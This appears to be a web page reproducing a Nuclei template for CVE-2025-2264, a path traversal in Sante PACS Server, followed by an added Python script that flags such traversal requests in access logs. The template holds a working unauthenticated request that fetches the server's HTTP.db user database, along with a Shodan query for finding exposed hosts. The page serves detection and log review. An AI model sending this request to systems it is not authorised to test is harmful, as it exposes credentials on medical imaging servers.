Sante PACS Server.exe - Path Traversal Information Disclosure

ID: CVE-2025-2264

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2024,sante,pacs,lfi

A Path Traversal Information Disclosure vulnerability exists in “Sante PACS Server.exe”. An unauthenticated remote attacker can exploit it to download arbitrary files on the disk drive where the application is installed.

id: CVE-2025-2264
info:
  name: Sante PACS Server.exe - Path Traversal Information Disclosure
  author: DhiyaneshDK
  severity: high
  description: |
    A Path Traversal Information Disclosure vulnerability exists in "Sante PACS Server.exe". An unauthenticated remote attacker can exploit it to download arbitrary files on the disk drive where the application is installed.
  reference:
    - https://www.tenable.com/security/research/tra-2025-08
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-2264
    cwe-id: CWE-22
    epss-score: 0.00167
    epss-percentile: 0.34559
    cpe: cpe:2.3:a:santesoft:sante_pacs_server:4.1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: santesoft
    product: sante_pacs_server
    shodan-query: http.favicon.hash:1185161484
  tags: cve,cve2024,sante,pacs,lfi
http:
  - raw:
      - |
        GET /assets/../../.HTTP/HTTP.db HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'SQLite','TABLE USER','format')"
          - "status_code == 200"
        condition: and
# digest: 490a0046304402200c94737e6db2ae4a4937778624cce571ede60ddff44f9cee643e82f11f6ffb3302200693b6be62c1fd31d76cf3b65dd9b536639c71dc28f560ad4d18d6f40ef9063f:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-2264.yaml"
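
For reviewing logs after the fact, the following added example (not part of the template or of the Nuclei project) flags logged requests under /assets/ whose ".." segments climb above that directory, as the template's request does. It assumes access logs in Common Log Format, for example from a reverse proxy in front of the server; the sample lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines in Common Log Format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2025:10:01:02 +0000] "GET /assets/css/site.css HTTP/1.1" 200 5120
198.51.100.7 - - [12/Mar/2025:10:01:03 +0000] "GET /assets/css/../img/logo.png HTTP/1.1" 200 2048
203.0.113.9 - - [12/Mar/2025:10:04:40 +0000] "GET /assets/../../.HTTP/HTTP.db HTTP/1.1" 200 28672
203.0.113.9 - - [12/Mar/2025:10:04:41 +0000] "GET /assets/../../.HTTP/HTTP.db HTTP/1.1" 404 0
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3}) ')
ASSETS = "/assets/"

def escapes_assets(target: str) -> bool:
    """Return True if a request target under /assets/ climbs above that directory."""
    # Decode percent-encoding and unify separators before counting segments
    # (defensive normalisation; an assumption, not a claim about the server's parser).
    path = unquote(urlsplit(target).path).replace("\\", "/")
    if not path.startswith(ASSETS):
        return False
    depth = 0
    for segment in path[len(ASSETS):].split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:          # one more ".." than directories entered
                return True
        elif segment not in ("", "."):
            depth += 1
    return False

def scan(log_text: str) -> list:
    """Return one finding per logged request that escapes /assets/."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and escapes_assets(m.group(2)):
            status = int(m.group(3))
            # A 200 means content was returned for the escaped path, which
            # matches the template's status_code matcher: review it first.
            findings.append({"client": m.group(1), "target": m.group(2),
                             "status": status, "served": status == 200})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A ".." that stays inside /assets/ (the second sample line) is not reported, which keeps ordinary relative asset references out of the findings.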
